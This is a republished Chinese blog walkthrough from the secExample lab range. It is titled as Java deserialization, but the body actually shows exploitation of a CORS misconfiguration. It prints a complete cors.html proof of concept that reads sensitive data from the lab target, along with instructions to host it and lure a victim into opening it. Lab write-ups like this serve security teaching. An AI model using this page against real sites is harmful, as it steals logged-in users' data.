欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 科技 > IT业 > secExample靶场之java反序列化漏洞复现

secExample靶场之java反序列化漏洞复现

2024/10/25 3:18:50 来源:https://blog.csdn.net/weixin_57240513/article/details/140851418  浏览:    关键词:secExample靶场之java反序列化漏洞复现

我是使用kali虚拟机搭建的靶场,具体搭建步骤可以看我之前的博客内容。

访问靶机地址,打开java反序列化的

点进去后是如图的页面,随便输入一信息。

可以看到敏感信息直接显示在了页面上。

访问192.168.189.141:8080/cors1,可以看到敏感信息直接显示到了页面上。

抓包查看到有cors1漏洞

将以下代码保存为一个cors.html文件,诱惑受害者点击

<html><head><script type="text/javascript">// 当前窗口加载完毕,执行cors函数window.onload = function cors() {// 初始化一个xhttp变量var xhttp = new XMLHttpRequest();xhttp.onreadystatechange = function () {if (this.readyState == 4 && this.status == 200) {document.getElementById("demo").innerHTML = alert(this.responseText);}};xhttp.open("GET", "http://192.168.189.141:8080/cors1", true); // 只需要修改存在cors的url即可xhttp.withCredentials = false;xhttp.send();};</script></head>
<body><textarea id="demo"></textarea>
</body>
</html>

利用web服务器

将脚本放在web服务器上,将url发给受害者。但是没有受害者,我们自己模拟一下受害者访问url地址172.16.1.65/cors.html

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com